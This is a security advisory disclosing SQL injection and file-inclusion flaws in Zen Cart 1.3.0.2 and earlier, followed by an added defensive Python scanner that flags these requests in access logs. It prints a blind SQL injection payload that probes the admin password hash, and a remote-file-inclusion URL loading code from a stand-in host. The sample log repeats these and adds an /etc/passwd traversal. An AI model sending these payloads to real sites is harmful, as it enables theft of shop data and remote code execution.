Zen Cart Multiple Vulnerabilities
Vendor: Zen Cart
Product: Zen Cart
Version: <= 1.3.0.2
Website: http://www.zen-cart.com/
BID: 19542
CVE: CVE-2006-4214
OSVDB: 28144 28145 28146 28147 28148 28149
SECUNIA: 21484
Description:
Zen Cart is a descendant of the popular osCommerce project and, like osCommerce, is one of the most popular open source ecommerce systems in the world. Unfortunately Zen Cart is vulnerable to quite a number of different attacks, and in some circumstances may allow an attacker to execute arbitrary code on the underlying web server with the rights of the httpd process. In addition to remote code execution, several different SQL injection attacks may be possible. The Zen Cart developers have committed fixes for these issues to CVS, and an updated version of Zen Cart will be released soon to address them. All users should upgrade their Zen Cart installation as soon as possible.


SQL injection:
There are a number of SQL injection issues in Zen Cart that allow an attacker to access and modify data stored in the underlying database. The first of these occurs when a malformed POST request is sent to the ipn_main_handler.php script. The root of the problem is that unsanitized GPC data is passed directly to the ipn_get_stored_session function, where it is then used in a query. Since all of $_SESSION is recreated from the results of this query, it is also possible, for example, to include arbitrary files by UNION SELECTing attacker-supplied data to overwrite certain elements of the $_SESSION array. Another vulnerable function within Zen Cart is whos_online_session_recreate. An attacker could use this issue to send arbitrary SQL to an UPDATE statement and, on newer MySQL versions, possibly subselect data. This issue can be triggered by sending a request to the login page with a malformed session ID in the cookie: once the attacker successfully logs in, the old session ID taken from the cookie is passed to the vulnerable function, allowing arbitrary SQL to be injected. Once logged in, an attacker can also perform SQL injection by supplying SQL in the quantity field while updating their shopping cart; the vulnerability here lies specifically in the add_cart function. Still within the shopping cart, SQL injection is also possible when adding items with malformed attributes (specifically the id[] parameter) and when entering a malformed redemption code during checkout.

-99' UNION SELECT IF(MID(admin_pass,1,1)='2',1,0),2 FROM admin WHERE 1/*

Above is an example of the data that could be sent via the id[] parameter when adding items to the shopping cart. If the first character of the admin password hash is 2, no SQL error will be shown.


Remote File Inclusion:
Zen Cart suffers from a few file inclusion vulnerabilities that may lead to the execution of arbitrary code. Fortunately, most of these issues are only exploitable locally because of the difficulty of getting null bytes through Zen Cart's sanitization functions. For example, an attacker is able to include arbitrary local files by specifying an arbitrary path in the "typefilter" parameter, since traversal sequences are never filtered out. However, below is a much more dangerous instance of remote file inclusion in Zen Cart.

/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://shell

The above example is possible because an uninitialized array is passed to autoload_func.php. The issue requires register_globals to be on; when it is, it allows remote code execution.
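As an added defender-side example (not part of the advisory or of Zen Cart), the following Python scan runs over constructed access-log lines and flags the three request shapes described in the SQL injection and Remote File Inclusion sections: client-supplied autoLoadConfig[] keys (a URL value is flagged as RFI), traversal sequences in typefilter, and SQL metacharacters in id[]. The log lines, client IPs and the 203.0.113.9 host are constructed; the advisory does not name the quantity or redemption-code form fields, so only id[] is checked for SQL injection.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache-style access-log lines (not taken from the advisory).
# Lines 1-3 mirror the three request shapes described above; line 4 is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Aug/2006:10:01:02 +0000] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://203.0.113.9/x.txt HTTP/1.1" 200 512
10.0.0.6 - - [14/Aug/2006:10:01:05 +0000] "GET /index.php?main_page=product_info&products_id=12&id[]=-99%27+UNION+SELECT+IF(MID(admin_pass,1,1)%3D%272%27,1,0),2+FROM+admin+WHERE+1/* HTTP/1.1" 200 812
10.0.0.7 - - [14/Aug/2006:10:02:11 +0000] "GET /index.php?main_page=page&typefilter=../../../etc/passwd HTTP/1.1" 200 300
10.0.0.8 - - [14/Aug/2006:10:03:00 +0000] "GET /index.php?main_page=index&cPath=1_4 HTTP/1.1" 200 9123
"""

# Apache common/combined format: client IP, timestamp, request line, status.
REQ_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# A UNION ... SELECT clause, or a quote followed by a comment terminator.
SQL_RE = re.compile(r"(?i)\bunion\b.*\bselect\b|['\"].*(/\*|--)")
# Only id[] is named by the advisory; the cart quantity and redemption-code
# field names are not given there, so extend this tuple for your installation.
SQL_PARAMS = ("id[]",)
URL_SCHEME_RE = re.compile(r"(?i)[a-z][a-z0-9+.-]*://")


def classify_request(target):
    """Return (rule, parameter, decoded value) hits for one request target."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name.startswith("autoLoadConfig["):
            # A client should never set this array; with register_globals on
            # it overrides the autoloader config, and a URL value means RFI.
            rule = "rfi" if URL_SCHEME_RE.match(value) else "autoload_override"
            hits.append((rule, name, value))
        elif name == "typefilter" and ".." in value.replace("\\", "/").split("/"):
            hits.append(("lfi_traversal", name, value))
        elif name in SQL_PARAMS and SQL_RE.search(value):
            hits.append(("sqli", name, value))
    return hits


def scan_log(text):
    """Return (ip, rule, parameter, value) for every flagged request in text."""
    findings = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if m:
            for rule, name, value in classify_request(m["target"]):
                findings.append((m["ip"], rule, name, value))
    return findings
```

Running scan_log(SAMPLE_LOG) yields four findings: an autoload_override and an rfi hit for the first request, an sqli hit for the second, and an lfi_traversal hit for the third; the benign fourth request produces none.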


Solution:
The Zen Cart developers have committed fixes for these issues to CVS, and an updated version of Zen Cart will be released soon to address them. All users should upgrade their Zen Cart installation as soon as possible.


Credits:
James Bercegay of the GulfTech Security Research Team